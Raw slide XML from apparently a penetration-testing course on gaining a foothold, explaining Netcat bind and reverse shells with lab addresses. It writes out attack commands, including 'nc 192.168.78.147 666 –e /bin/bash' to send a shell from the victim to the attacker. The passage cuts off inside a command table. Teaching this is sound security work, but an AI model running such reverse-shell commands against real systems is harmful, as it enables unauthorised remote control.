              </a:rPr>
              <a:t>). </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>This is demonstrated in the example below.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> uses standard input (stdin), standard output (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>), and standard error (stderr) to the IP socket.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagem 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3260F92A-CDAB-A1E0-F0AE-C38A6FABF288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1869237" y="2073305"/>
            <a:ext cx="3054829" cy="490088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="CaixaDeTexto 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04E12160-5497-0081-AA17-21DA85A38413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-10783" y="3001530"/>
            <a:ext cx="550113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1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>As shown in the example on the side, on the attacking system (192.168.78.147), the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>nv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> 192.168.78.6 1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> command is used to connect to the victim (192.168.78.6). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Once the attacker connects to the victim, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> command is invoked, and three files are shown in the attacker screen.        </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagem 9" descr="Texto&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2B18D43-ECA7-2D64-7D56-7B1568E7E556}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5691187" y="3039644"/>
            <a:ext cx="3163917" cy="1317864"/>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3502854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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reverse and Bind Shells (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-10783" y="827387"/>
            <a:ext cx="896227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latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>When the attacker connects, the highlighted message in the example below is displayed in the victim’s system.           </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagem 5" descr="Tela preta com letras brancas&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90BF8F35-58F7-5CE2-04EC-CA12BFDBF646}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1936393" y="1466334"/>
            <a:ext cx="3648972" cy="476733"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22CD6E20-61CB-536B-DDE0-48A6BB911773}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2191299"/>
            <a:ext cx="896227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latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>One of the challenges of using bind shells is that if the victim’s system is behind a firewall, the listening port might be blocked. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>However, if the victim’s system can initiate a connection to the attacking system on a given port, a reverse shell can be used to overcome this challenge.                 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CaixaDeTexto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDBD9542-2DBF-D2E7-B05A-482A7199C2BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2823" y="3258525"/>
            <a:ext cx="5029764"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1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The example on the side shows how to create a reverse shell using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> 666</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> command in the attacking system to listen to a specific port (port 666 in this example). </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagem 6" descr="Texto&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C1F13D9-E89E-E8D1-8729-91A58E6473D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292306" y="3294709"/>
            <a:ext cx="3400964" cy="1185138"/>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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3625146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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reverse and Bind Shells (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2221" y="957785"/>
            <a:ext cx="905932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cs typeface="Arial"/>
              </a:rPr>
              <a:t>Then on the compromised host (the victim), you can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> 192.168.78.147 666 –e /bin/bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>command to connect to the attacking system, as demonstrated in the following example.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagem 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41B0A64E-9B7D-F234-D5EE-2DE5A7AECA08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507466" y="1565636"/>
            <a:ext cx="4360652" cy="276162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CaixaDeTexto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDBD9542-2DBF-D2E7-B05A-482A7199C2BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7960" y="2417450"/>
            <a:ext cx="528855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a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Once the victim system (192.168.78.6) is connected to the attacking system (192.168.78.147), you can start invoking commands, as shown in the highlighted lines in the example on the side.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagem 9" descr="Texto&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B425893-3D47-3C6F-735D-A0F620A1083C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551098" y="2508192"/>
            <a:ext cx="2904945" cy="2305285"/>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3938931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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reverse and Bind Shells (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2221" y="925436"/>
            <a:ext cx="896227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rgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The following table lists several useful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> commands that could be used in a penetration testing engagement.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Tabela 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5EA211B-14AC-0385-C983-3D175C0D4AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="840749096"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1127473" y="1477188"/>
          <a:ext cx="7093401" cy="3303632"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2672729">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="360457933"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4420672">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3995444981"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="367392">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Command</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2242075988"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>nc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>nv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> &lt;IP Address&gt; &lt;Port&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Using </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Netcat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> to connect to a TCP port.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="761296095"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>nc</a:t>
                      </a:r>
                      <a:r>
